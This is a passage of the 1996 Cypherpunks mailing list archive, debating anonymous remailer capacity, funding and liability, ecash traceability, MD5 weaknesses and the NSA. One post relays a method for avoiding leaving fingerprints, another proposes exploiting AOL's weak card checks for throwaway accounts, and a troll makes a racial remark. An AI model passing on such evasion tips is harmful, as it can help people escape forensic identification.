operate some for-pay remailers, in order to make some money from sources
besides contributions? Possible disadvantages:
	A. It could get sued, and thus lose funds
	B. If its prices were set too low, it could wind up driving other
remailers out of the market (combination of low price with likelihood to still
be there), and thus become a vulnerable point.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 20 May 1996 22:36:25 +0800
To: jim bell <stewarts@ix.netcom.com>
Subject: Re: Rumor: DSS Broken?
Message-ID: <199605200803.BAA11630@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:05 PM 5/19/96 -0800, jim bell wrote:
>At 08:33 AM 5/19/96 -0400, Robert Hettinga wrote:
>>At 9:41 PM  -0400 5/18/96, Bill Stewart wrote:
>>> MD5 is at least weakened, maybe broken; there's an abstract by Hans
>>>Dobbertin
>>> that says something about generating collisions, and gives an example
>>> (though the abstract doesn't say how general the method is.)
>>
>>That's what I get for not reading the DSS stuff when it came out. I'd heard
>>lots about the MD5 stuff, but I didn't put the two together.
>>
>>It also looks like I'm behind in my reading.  Time to buy another edition
>>of Applied Cryptography...
>
>It should occur to all of us that if the NSA was actually doing the job we 
>are vastly over-paying them to do, it is THEY who should be finding, 
>exposing, and correcting these kinds of cryptography faults.  Has anybody 
>ever heard any evidence that the NSA has ever acted in this sort of 
>responsible role?

I was rather impressed by NSA's role in the creation of DES.  The
strengthened it against an attack which was not publicly known, and didn't,
in the process, reveal the attack.  (See AC2.)


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 20 May 1996 20:52:27 +0800
To: cypherpunks@toad.com
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <adc574460d0210046388@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:07 AM 5/20/96, E. ALLEN SMITH wrote:
>        What countries are noticeable for being anti-Scientology? They would
>appear to be good locations for special-purpose remailer ultimate-output ends.

But any country that is "anti-Scientology" is likely to be repressive in
various ways we would find inimical to our goals. Germany is a prime
example: yes, they have placed restrictions on the CoS, but they have also
ordered crackdowns on Internet sites.

Whatever one may think of Scientology, or Catholicism, or Baalism, or
whatever, crackdowns by the government ("anti-Scientology,"
"anti-Catholic," etc.) is not a good thing.

(The issue of how believable the claims of CoS are is no more relevant than
similarly outlandish claims that taking communion is eating the flesh of
JC. And the issue of CoS seeking legal actions against those they claim are
violating their copyrights is separable from their religious status. As I
have said many times, "Newsweek" would likely take similar actions in
similar circumstances.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 20 May 1996 18:03:04 +0800
To: jimbell@pacifier.com
Subject: Re: Why does the state still stand:
Message-ID: <01I4WSQY7EH68Y5FKU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jimbell@pacifier.com"  "jim bell" 18-MAY-1996 02:54:47.09
>On the other hand, the government also has enormous "obligations" that keep 
>it close to bankruptcy.  It wouldn't take a great deal of interference in 
>its ability to collect taxes to put it solidly in the red based on current 
>receipts.  And remember, if the individuals who populate government could be 
>persuaded that their tenure would be forcibly shortened if they didn't 
>resign, they wouldn't stick around.  Once that cohesiveness of jointly 
>sucking on the government tit is eliminated, I think they'll cut and run.   
>These people are working for a fat paycheck and the promise of a retirement 
>package, and it wouldn't take much convincing to show them that they won't 
>get either for very long.  I'm convinced that's why so many Senators and 

	While quite a lot of people in the government are working just for
the paycheck, there are also some idealists - and some who are working for a
"power paycheck" rather than a "cash paycheck." I'm willing to bet that that's
the case with the NSA and its _general_ opposition to cryptography. You'll have
three basic groups:
	A. Those who are idealists. This can be divided into two categories.
		1. Those who idealize the power of government, such as via a
			devotion to democracy. These oppose cryptography
			because it weakens the government.
		2. Those who are primarily interested in protecting America
			from everyone else. These promote cryptography, and
			need to be supported.
		3. Those who (stupidly) believe in the US government enough
			to "just follow orders," as the Nuremberg phrase goes.
			If you can get the type 2 idealists in power, these
			will do the right thing.
	B. Those who want power. These oppose cryptography because they will
lose power if it is widely implemented.
	C. Those who are just there to get a paycheck. These will act in most
situations about like an idealist of type 3, but when push comes to shove won't
be willing to back it up seriously.
	I'd appreciate feedback from anyone who's dealt with the intelligence
community more than I have (not particularly difficult) to confirm or deny the
above classification system, and give some idea as to the proportions within
the NSA, government in general, etcetera.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sally D. McMillan" <103007.3426@compuserve.com>
Date: Mon, 20 May 1996 17:55:49 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: 5 MINUTE CYPHERPUNKS SURVEY
Message-ID: <960520052137_103007.3426_GHU38-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


Hi! Im writing a paper for school on E-commerce and would like to include a
brief section on the role of Cypherpunks in E-commerce. If you would, please
email me your responses to the following questions. 

Some of these questions are broad, but please limit your response to each
question to 0-100 words. Also, I am NOT attempting to stereotype the
Cypherpunks, but am instead interested to learn whether there is a shared view
among them. THANKS! 
PS- PLEASE RESPOND TO MY EMAIL DIRECTLY by FRIDAY, 5/24/96 :
103007.3426@compuserve.com

1. Would you call yourself a Cypherpunk? (Y, N, Not Sure)

2. What is the role of Cypherpunks in the DEVELOPMENT of secure E-commerce
transactions?

3. What is the role of Cypherpunks in the MAINTENANCE of secure E-commerce
transactions?

4. Why do Cypherpunks care about E-commerce? (Please limit to 100 words or
fewer.)

5. What is a punk? What is a Cypherpunk? Can you distinguish between those who
are up to no good, trying to crack security and those who try to crack security
in order to maintain it? Do Cypherpunks, in your opinion, fall into either
category?

6. What is the greatest security threat to E-commerce transactions?

7. On a scale of 1-10, how dangerous is it to give your credit card number to
a vendor over the internet? (Please provide one number only for this answer.)

8. On a scale of 1-10, how would you rank your own knowledge of E-commerce and
related security issues? (Please provide one number only for this answer.)

May I quote part of or all of your answers in my paper? Would you like to be
referenced by name, email address, or as Anonymous? Please provide pertinent
details.

THANK YOU FOR FILLING OUT THIS QUESTIONNAIRE! Please forward your responses to
me at: 103007.3426@compuserve.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 20 May 1996 17:37:32 +0800
To: sinclai@ecf.toronto.edu
Subject: Re: Defeating fingerprints
Message-ID: <01I4WSZWZK348Y5FKU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"sinclai@ecf.toronto.edu"  "SINCLAIR DOUGLAS N" 18-MAY-1996 04:15:33.26

>Not that random playing with carcinogenic chemicals is a good idea, but...
>I've found that if you use just one reagent from epoxy glue, the collagen
>in your skin will disolve.  You can sculpt it into whatever shape you want,
>and it will stay that way for an hour or so.  I don't remember if it was
>the resin or the hardener though.  This was regular 5 minute epoxy.

	I somehow doubt that the collagen is dissolving. You may be loosening
the keratinized dead skin cells and pushing them around, and then they flake
off in some length of time (probably speeded up by this treatment). Any
signs of redness, etcetera in the skin afterwards? Unusual sensitivity of the
fingertips, especially to pain?
	One thing to keep in mind is that fingerprints aren't just from the
whorl pattern that you see. They're also from that the sebaceous (oil) glands
in the skin are arranged along those whorls. You need a pretty resistant
barrier to stop these. I've been told by the son of a cop that the combination
of a pair of latex gloves with a couple layers of cotton gloves stops both the
oils and the normal pressure patterns.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 20 May 1996 21:14:56 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: WELCOME TO THE NEW ROMAN EMPIRE
In-Reply-To: <Pine.SV4.3.91.960519221439.18178K-100000@larry.infi.net>
Message-ID: <Pine.GUL.3.93.960520002932.27769A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

(I really don't think a [NOISE] tag is necessary; do you?)

On Sun, 19 May 1996, Alan Horowitz wrote:

[ALL CAPS is by Skippy <qut@netcom.com>]
> > > EVERYONE GETS A HIGH SCHOOL DIPLOMA --> HIGH SCHOOL DIPLOMAS BECOME
> > > WORTHLESS EVERYONE GETS A PHD --> PHDS BECOME WORTHLESS
> > 
> > Will someone please buy this man a shift key and some Thorazine?
> 
>     Yeah, next thing ya know, somebody will be claiming that Physics PHds 
> can't get work now, and that MD's being out of work is right around the 
> corner. (Newly minted board-eligible Pathologists have it worst, right now).

Funny, I just watched an out-of-work physics PhD talk about a related
subject on 60 Minutes. Confirmed what I already thought about him, Mike,
and Morris (they're all idiots).

Skippy is just playing around with markov again. He trolls in waves:
humor -> trust -> confrontation -> outbust -> quiet -> lather, rinse,
repeat.

If you have any serious questions about Skippy and friends, please encrypt
your message with the key that follows. I'll probably have something
interesting (and on-topic) to share for the putative June 8th SF area
cypherpunks meeting (we'll have a real room).

- -rich

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzE4pKQAAAEEAMUH20RG0Uh0KXcIu5gTFM6NgHoDW5fBewmO4HvYwgBa8deq
BwMbKW7bhbiG8uvFtvvhYbN/77DSDT8pTnUZkUtpUQsPNPTUSIUJsAQc9ndJBu7w
KjWjwyg3kc4MDHq349nAdBuynVcOMZ46Q5lIaxQIsPTPRI57GUCtQY1pkqtNAAUR
tD5SaWNoIEdyYXZlcyBTZWN1cmUgT2ZmbGluZSA8cmljaC5ncmF2ZXNARm9yc3l0
aGUuU3RhbmZvcmQuRURVPokAlQMFEDFAYCxpqHkdFx/OXQEBiV0EAIGcpREw66qj
TT3+3QRz1c4mBwoDhmzDqPBvXegt7zvZ1OyT7aqZGTnqodXLtnCNyzMyOHrXTUBL
NCTgSFM0H6QRsoBt0xzbiW+XWHHiuQgHJtdyTg40iFQsNrZj7Va+qiS3W7e5w8wh
DW6qsulbxyudZtISANBrlhQnz/B5Xpn9iQCVAwUQMTim643DXUbM57SdAQFZOAQA
wdu9vyKI+lMPBGlagfQ62Og01JzKh3L/LM32UUpmi35AKSc0EGIG5GV5zOFA9BsT
gHzrL9msRvWx6uUzvEDE8BzMHTrf41mr6Btq+S5O8VrAnfYNdXMeRUG9sJHGOaY+
wETLEImZr7Ljam57g1ZNgBaERdrbpGoTomoVEnEGlwyJAJUDBRAxOKaEJ7zIom1K
rF0BAQTGBACZqNPEMVIQctVzWTw7NeyanLenm8mx+FXul+9FSxczrbJT3Q6i+MLv
EPop41NGUfIrhazW7SFtT0v5ewaGRz8NBkWJNMRWoe7oW/CRmwR63BjlYubS4LuS
7xJeSqaBU/033E13oV8H2dBrx/BaxpCdK5mU+d58ZOeo9hqcw3ZF44kAlQMFEDE4
pm0UgSBs4SlmTQEBlLUEANGLCXSDx4T/FcFg9Q94ADAb1Gn9D9YBiaBjozfdZ+Ve
Y/WeofLomelBHqUCaw77UFT1Fmq0Wyw5ym7eHCSb/cR9E2g4LTZpVdGF8nFZbX+N
yqvTSxEsaP2Psdlpvwj3eGQ/hTdm12bX7XhJF1j5q4i0kh7c+d+a9rrDd39jGEjT
iQCVAwUQMTimUNlBWyzhG2y5AQEXkAP/UdPPZU6WvAHI+JjrVIZRKgs3f5qt7ADI
K7NIm1aQRVmIDBTICY/2tkMmLdqR+MW2n6AkrSkB7P+vvz1rK2LSsERBHK1rjgZt
z77v2NnEVr5McAhgGX9uWUbmgXghMCtJwnaKCpSpFs31E2TxLRBmb6fwwAzfEfYq
OMSiMND6lfKJAJUDBRAxOKYx5PUudM+LRA0BAasdA/0bLGOIUDk2RbFG0jW5Rw/N
RiExtU5SSmOUo6FsOgHDmbL/jJIrWQS6TacJM1IiK7ECd72mkLm4NDwVUhJmNyHn
uqOL+HvhLp9zTp9K72PsDHnCGYYJG3atk2c05iQ0tK8WBMR1sUwAWHulCjfKCg5f
K2ydt9o6lQNdENQm9xj9LIkAlQMFEDE4piIaFuRhG5FXbQEB7dYEAJ3U3/MtK3DX
5gtms2iF66Kei+5TBnhQOeBVEP3PZPGdwazbotHbgiCQYEPPN1S2nF7e9mJj/UDe
XX7sMvnPDJXZe+nzlidywETzeQinQ6mz9rQ9yuRHbWLq6ufH7CUi+rniCM5z/i1G
sGOI6NenzUHb4y9K8fx3O04OsE8z85GuiQCVAwUQMTik/0CtQY1pkqtNAQFucQP/
Vc3fsN6gClxDSLpq+Gbxhy5eFmCLuFRZcxbS+qTQo3DDS1q6AQ7lMQ7TZSngmHLE
59a85+iEdafrODldoG/PfgRjaqROSHXzD65SoUYECdtvN2JrFdSPRUde8UesMDhv
4Z2ZK8LzXuj9+jDV6bp0vvmlzan4KwwCSAeXA+enDCe0RUtleSAweENDRTdCNDlE
IHByaW50IEVEIENBIDY3IDk4IEFEIDJBIDYyIDJBICAwMSAxNyA3OCBBOCAzMyBG
MiA2RCBFMLQxTm9ybWFsbHkgdXNlIGtleSAweENDRTdCNDlEIGZvciBsbHVyY2hA
bmV0d29ya2luZw==
=MFwF
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMaAp2Y3DXUbM57SdAQEsiAP8CdB4xC1wHHf0rCa2Fr020FzH7U35SMQV
s4bITaBovLyXPm+yyDcruxa7kdrHNDkvM3QY6qe+Hde3R+7N3/tg66L4J78Fu184
RJBF6A4RkmEutoUKn3+ydRmVk+J7LWDZL+0IDc2sgk51vJiUSLrgExnXEIgC38GP
KYU319Xjv3U=
=axFz
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 20 May 1996 17:55:31 +0800
To: richieb@teleport.com
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <01I4WUETAM528Y5FKU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	What countries are noticeable for being anti-Scientology? They would
appear to be good locations for special-purpose remailer ultimate-output ends.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 20 May 1996 17:51:31 +0800
To: llurch@networking.stanford.edu
Subject: Re:  SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <01I4WUJDSY8C8Y5FKU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"llurch@networking.stanford.edu"  "Rich Graves" 18-MAY-1996 09:07:35.05

>On Thu, 16 May 1996, Bill Stewart wrote:

>> ==================================================================
>> This message was posted from the anonymous remailer at www.jim.com.
>> Send any complaints to webmaster@www.jim.com .
>> Please don't post any copyrighted material longer than fair use quotations.
>> And did you know that Scientology's highly overpriced documents say that
>>         "<random paragraph quotation>"
>> ===================================================================

>Once I was more or less done laughing and got off the floor, it occurred
>to me that this could provide a revenue stream for anonymous remailers. 
>You'd charge advertisers sub-pennies for these little trailers. I
>understand that Sameer is getting very little Ecash for his
>remail/by-www.html, but maybe if he sold advertising space?

	It's an interesting idea. One wonders if EFF would be interested in
such a sponsorship? One could even add, say, an ACLU promotion to the end of
messages without getting cash from the ACLU - this might encourage them to give
more backing in case of a legal dispute. (You scratch my back, I scratch
yours... I'm not meaning to be offensive to the ACLU, BTW.)
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 20 May 1996 19:49:44 +0800
To: ravage@ssz.com
Subject: Re: Remailers & what they get out of it...
Message-ID: <01I4WUPVKJ9E8Y5FKU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"ravage@ssz.com"  "Jim Choate" 18-MAY-1996 09:43:06.96

>As long as the remailer is run a 'grins & giggles' affair you are right.

	There is the increase in reputation capital in _some_ quarters possible
through running a remailer. (On the other hand, in authoritarian quarters, it
would tend to decrease one's reputation capital...)

>To me the biggest problem with the crypto work right now is that not enough
>professionals are involved. If more remailers and such were initiated as 
>a business there would be legal avenues to explore. Also, in this vain is
>the apparent lack of support for commercial ventures by developers of such
>apps as MixMaster (whose license explicity prohibits commercial use).

	It prohibits commercial use? That's silly. Is it a
holdover from when the idea was to turn Mixmaster into a company?

>And for the record, yes, we expect to charge real $$$ for access. Our
>current plan is $10/month for each account. Money orders prefered. We have
>at this point pondered e-cash methods but it doesn't seem popular enough
>at this juncture.

	How would you be doing this? Only remailing from accounts that have
paid up, or what?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 20 May 1996 18:56:23 +0800
To: cypherpunks@toad.com
Subject: Re: SEVERE undercapacity, we need more remailers
Message-ID: <01I4WUZKQ6ZC8Y5FKU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	It occurs to me that a certain number of companies have schemes that
could easily be used to set up anonymous, transient mailing output ends on
anonymous remailers. These are AOL (with its famed lack of true credit card
verification) and free email services such as Juno. The idea would be to have
a remailer address that took in mailings, then sent any that were to go other
than to another remailer via a temporary account. Now, this would have the
potential problem of decreasing remailer reputation among those in such
companies; for AOL, it would also decrease the chance of anyone paying
attention to the remailed messages (people deleting stuff from @aol.com
automatically, etcetera).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 20 May 1996 18:02:49 +0800
To: unicorn@schloss.li
Subject: Re: anonymous companies
Message-ID: <01I4WV3W0UHO8Y5FKU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 18-MAY-1996 11:16:57.48

> At 06:42 PM 5/16/96 -0700, Wei Dai wrote:
> > Solution: smart contracts.  This is Nick Szabo's idea of building
> > contractual obligations into cryptographic protocols so that the parties
> > have no choice but to fullfil them.  But again we don't know whether this
> > will actually work for this problem.

>But what happens when there are nuances or circumstances which contracts
>do not anticipate?  This "complete" reliablity is also a curse for
>flexibility which fast moving entities need to survive.

	That's an argument for combining them with escrow agencies. If the
escrow agency is less likely to need to intervene, then they'll charge less...
the principle of insurance company risk estimation.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 20 May 1996 20:20:56 +0800
To: unicorn@schloss.li
Subject: Re: A cryptographic alternative to escrow agents (Matts' half coin)
Message-ID: <01I4WV612VG28Y5FKU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 18-MAY-1996 11:46:08.35

>The mint is the escrow agent.  It still (obviously) needs to be trusted.

	The mint will need to be trustworthy anyway; otherwise, you can get a
"final round" problem in which they print up lots of ecash and spend it before
the value completely plummets, or they get lots of requests to cash existing
ecash in.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Mon, 20 May 1996 21:53:40 +0800
To: cypherpunks@toad.com
Subject: Re: Virtual machines?
In-Reply-To: <9605200344.AA02438@cti02.citenet.net>
Message-ID: <199605200932.CAA23030@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! Hi.
! 
! Pardon my ignorance, but I had a few questions haunting me since a 
! while.
! 
! Is there a way to have a remailer de-localize itself and relocalize 
! itself over the internet?
! 
! For example, could there be several machines around the worlds that,
! when you send an e-mail to it, is routed to differents physical
! places of the world depending on where the actual remailer process is
! actually running?  Could there be such a thing as a virtual machine
! runing a remailer that gets to hop from physical machine to physical
! machine around the world?
! 
! Just an idea to avoid jurisdiction problems.

This is just what crypto remailers do.
Public key encryption with To: 's encrypted at each hop threading through several servors.
This is why we need 1,000 servors created quickly,
throughout the far corners of the internet,
to make it a safer,
as far as liability is concerned,
to admin them.

The last full featured remailer servor closes this May 20.
Qut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 20 May 1996 19:58:19 +0800
To: tcmay@got.net
Subject: Re: Is Chaum's System Traceable or Untraceable?
Message-ID: <01I4WVDLFCHK8Y5FKU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 18-MAY-1996 14:30:54.29

>I agree with Jim Bell on this completely. I don't know if Chaum has been
>seduced by the Dark Side, or is looking to get digicash widely deployed by
>"respectable" institutions, or is telling the truth (that his system
>_never_ provided for real untraceability), but I know that Cypherpunks
>should always strive for full untraceability.

	Given what I've picked up (including what institutions he's chosen to
deal with, the behavior of these institutions - MTB's dropping of merchants
disapproved of by Mrs. Grundy et al, and other information), I am willing to
bet that the second is the priority. Once his patents run out, all bets are
off... but it looks like he's wanting to get ecash accepted before then.
Otherwise, everyone may be using various non-anonymous (or GAKed anonymous)
methods like credit card encryption.
	Unless I'm reading the ecash protocols wrong, using the current version
of the software some degree of payee anonymnity is possible.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>mix-admin@anon.lcs.mit.edu
Date: Mon, 20 May 1996 22:07:23 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
Message-ID: <199605200640.CAA00544@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> not!!! I should have made this clear, but imho no matter how favorably
> the public sees anonymity, I still believe there will be little
> incentive to run remailers until there is some kind of ecash
> scheme.

I hope this is not true.  Some of us simply believe it is important to
help people with unpopular opinions speak without fear of harassment.
I for one will continue to operate a free remailer even if the
technology becomes available to charge for the service.  I hope others
will, too.

Some people do care about things other than money.  I hope the reason
there aren't more remailers out there is simply that it is sort of a
pain to set one up, rather than simply because nobody cares.

> >People seem to forget that anyone can drop a letter into the mailbox with
> >no return address. Did the Unabomber bring negative publicity to the 
> >postal service, causing people to demand that return addresses become a 
> >requirement? :-/
> 
> agreed, but the subject at hand was not whether anonymity is good or bad, 
> but whether there is some incentive to run remailers.

Well, wanting there to be remailers is a good incentive to run one.
Another good incentive is if you ever want to send a truly sensitive
anonymous message.  If you chain through your own remailer, then you
can be absolutely sure that at least one remailer in your chain is not
run by "bad guys."

> I would be interested if any longtime remailer operators posted
> statistics about the amount of mail going through their services.

Usage statistics are publicly available from mixmaster remailers by
sending mail with subject "remailer-stats".  Whenever I've checked,
the number of messages through the lcs mixmaster remailer has been
around 300/day.  This is neither a longtime remailer nor a
particularly accurate statistic, but it should give you some idea.

mix-admin@anon.lcs.mit.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMZ//ZETBtHVi58fRAQHePQP+JQcCu/zDfhRB1BLOea+OSENfM6qRxj0h
KlYtV5O+IgcmlfZ+vupbtds6IrL8GN5YAQ7kpLoSCIUPC3+r4X0ppJjqgETEYI23
cJoZU9tG3Csj+KNSRn7tDjXdPFcGooqemvhV5SERiQEkAYqzRBDCcd7VQTOGgls5
TTRHxUQ1F+c=
=DOAo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 20 May 1996 19:49:22 +0800
To: loki@infonex.com
Subject: Re: The Crisis with Remailers
Message-ID: <01I4WVQJYM428Y5FKU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"loki@infonex.com" 18-MAY-1996 20:02:12.04

>I was invited to the digicash API design meeting precisely to make sure it
>could be used in remailers. It will not be using the current API. The
>problem is that Mixmaster requires exact knowledge of the size of every
>object in the message, to maintain constant message size. I could set aside
>room for one, two, three coins, but there is no guarantee that the payment
>will be made with only that many coins. The current API is going to be high
>level. It will does not allow the program to know anything about the
>internals of the payment. I need to be able to specify payment of amount X
>using no more than N coins. As soon as I have that level of control, you
>will see postage in Mixmaster.

	Good. I can see doing a limited postage now, actually, with relatively
simple modifications - the postage goes to the initial remailer front end and
to the remailer that sends out the message to something other than another
remailer.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Mon, 20 May 1996 23:02:22 +0800
To: cypherpunks@toad.com
Subject: Re: Incorporating
In-Reply-To: <199605200437.GAA20138@spoof.bart.nl>
Message-ID: <199605201016.DAA26766@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! How do corporations work, in terms of liability?  If the cost of 
! incorporating isn't forbidding, I would think a remailer operator might 

An excellent idea for reducing civil liabilty.
It's easy and cheap to incorporate a delaware for-profit corporation.

Following certain practices,
vastly increases your legal status.
Such as the corporate boilerplate of:
Stock certificates;
Proper titles and roles that are duly recorded;
Proper minutes, meetings, accounting;
Good Articles of Incorporation.

In other words,
Sameer the $USER is very different from President/Chairman Sameer Parekh of C2, Inc.

A non-profit corporation is considably different,
and for certain reasons,
would not be as good as for-profit for potentially shielding civil liability.
(Unfortunately, case law suggests that.)

! consider incorporating a company, and making the remailer a function of 
! that company.  That way, any losses are restricted to the total value of 
! the corporation; that is, nothing.  Any flaws?  There must be something 
! wrong with it somewhere.

Less freedom than the sole-proprietor.
Following the corporate protocols.

! Thanks.

Thank you for your contribution,
Qut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Mon, 20 May 1996 23:59:46 +0800
To: \
Subject: CAPITALISTS' SUCK
In-Reply-To: <199605200028.UAA14968@jekyll.piermont.com>
Message-ID: <199605201107.EAA07682@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! Date: Sun, 19 May 1996 20:28:04 -0400
! From: "Perry E. Metzger" <perry@piermont.com>
! 
! >Dave Harman writes:
! >
! > CAPITALISTS' SUCK
! 
! What witty social commentary.

Information wants to be free.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Tue, 21 May 1996 00:40:55 +0800
To: \
Subject: Re: WELCOME TO THE NEW ROMAN EMPIRE
In-Reply-To: <Pine.GUL.3.93.960520002932.27769A-100000@Networking.Stanford.EDU>
Message-ID: <199605201123.EAA12454@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! [ALL CAPS is by Rich Graves <qut@netcom.com>]
! > > > EVERYONE GETS A HIGH SCHOOL DIPLOMA --> HIGH SCHOOL DIPLOMAS BECOME
! > > > WORTHLESS EVERYONE GETS A PHD --> PHDS BECOME WORTHLESS
! 
! Skippy is just playing around with markov again. He trolls in waves:
! humor -> trust -> confrontation -> outbust -> quiet -> lather, rinse,
! repeat.

Skippy <llurch@stanford.edu> does not even know what Markov3 does.

! If you have any serious questions about Skippy and friends, please encrypt
! your message with the key that follows. I'll probably have something
! interesting (and on-topic) to share for the putative June 8th SF area
! cypherpunks meeting (we'll have a real room).

Skippy doesn't have any friends, so there's no one to answer the questions.

Qut may attend the meeting to verify the racial compositions of the group.
Results will be reported here.
Qut






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Mon, 20 May 1996 19:36:34 +0800
To: cypherpunks@toad.com
Subject: Re: Instant Remailers
Message-ID: <199605200437.FAA28623@pangaea.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Someone said:
> >It is possible for someone to operate an anonymous remailer anonymously.
> >Just get a UNIX shell account under a fake name, pay with cash, and set up
> >the remailing software.  The identity of the operator of such a remailer
> >would be difficult, if not impossible, to discover.

Then someone else said:
> (Doesn't Sameer's system offer such accounts? Couldn't there be dozens of
> remailers based at c2.org? Of the 16 Type-1 remailers listed in one of
> Raph's recent reports, only 2 were at c2.org.)

This happened.  Remember robo@c2.org? Whatever happened to it? (Anyone ever 
figure out who the real operator was?)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: remailer@2005.bart.nl (Senator Exon)
Date: Mon, 20 May 1996 17:23:56 +0800
To: cypherpunks@toad.com
Subject: Toastmasters?Incorporating
Message-ID: <199605200437.GAA20138@spoof.bart.nl>
MIME-Version: 1.0
Content-Type: text/plain


How do corporations work, in terms of liability?  If the cost of 
incorporating isn't forbidding, I would think a remailer operator might 
consider incorporating a company, and making the remailer a function of 
that company.  That way, any losses are restricted to the total value of 
the corporation; that is, nothing.  Any flaws?  There must be something 
wrong with it somewhere.

Thanks.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 21 May 1996 06:52:49 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
